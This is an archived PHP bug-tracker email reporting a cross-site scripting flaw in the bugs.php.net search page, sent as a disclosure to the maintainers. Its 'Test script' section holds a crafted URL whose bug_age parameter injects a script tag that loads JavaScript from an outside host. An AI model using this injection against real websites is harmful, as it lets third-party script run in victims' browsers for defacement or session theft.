Bug #51722 [NEW]: Cross Site Scripting Vulnerability on Bug Tracking Site
| From: | tedivm at tedivm dot com | Date: | Sun, 02 May 2010 21:25:35 +0000 |
| Subject: | Bug #51722 [NEW]: Cross Site Scripting Vulnerability on Bug Tracking Site | ||
| Groups: | php.webmaster | ||
| Request: | Send a blank email to php-webmaster+get-8072@lists.php.net to get a copy of this message | ||
From:
Operating system:
PHP version: Irrelevant
Package: Website problem
Bug Type: Bug
Bug description:Cross Site Scripting Vulnerability on Bug Tracking Site
Description:
------------
The bugs.php.net search engine does not sanitize it's input, thus allowing
an xss
attack.
The vulnerability has been posted on a blog and reposted on Reddit
(http://www.reddit.com/r/netsec/comments/bz4fw/php_website_xss_defacement/),
but
since I didn't see a bug report for it and it's
still active I'm assuming it hasn't been picked up by you guys.
Test script:
---------------
http://bugs.php.net/search.php?cmd=display&search_for=&php_os=&php_os_not=&author_email=&bug_type=&boolean=0&bug_age=%22%3E%3Cscript%20src=%22http://www.yourjavascript.com/38310202111/xss.js%22%20/%3E%3C&bug_updated=0&order_by=id&direction=DESC&limit=30&phpver=&assign=&status=Open&begin=0
Expected result:
----------------
I expect the injected javascript not to run.
Actual result:
--------------
The injected javascript runs.
--
Edit bug report at http://bugs.php.net/bug.php?id=51722&edit=1
--
Try a snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=51722&r=trysnapshot52
Try a snapshot (PHP 5.3): http://bugs.php.net/fix.php?id=51722&r=trysnapshot53
Try a snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=51722&r=trysnapshot60
Fixed in SVN: http://bugs.php.net/fix.php?id=51722&r=fixed
Fixed in SVN and need be documented: http://bugs.php.net/fix.php?id=51722&r=needdocs
Fixed in release: http://bugs.php.net/fix.php?id=51722&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=51722&r=needtrace
Need Reproduce Script: http://bugs.php.net/fix.php?id=51722&r=needscript
Try newer version: http://bugs.php.net/fix.php?id=51722&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=51722&r=support
Expected behavior: http://bugs.php.net/fix.php?id=51722&r=notwrong
Not enough info: http://bugs.php.net/fix.php?id=51722&r=notenoughinfo
Submitted twice: http://bugs.php.net/fix.php?id=51722&r=submittedtwice
register_globals: http://bugs.php.net/fix.php?id=51722&r=globals
PHP 4 support discontinued: http://bugs.php.net/fix.php?id=51722&r=php4
Daylight Savings: http://bugs.php.net/fix.php?id=51722&r=dst
IIS Stability: http://bugs.php.net/fix.php?id=51722&r=isapi
Install GNU Sed: http://bugs.php.net/fix.php?id=51722&r=gnused
Floating point limitations: http://bugs.php.net/fix.php?id=51722&r=float
No Zend Extensions: http://bugs.php.net/fix.php?id=51722&r=nozend
MySQL Configuration Error: http://bugs.php.net/fix.php?id=51722&r=mysqlcfg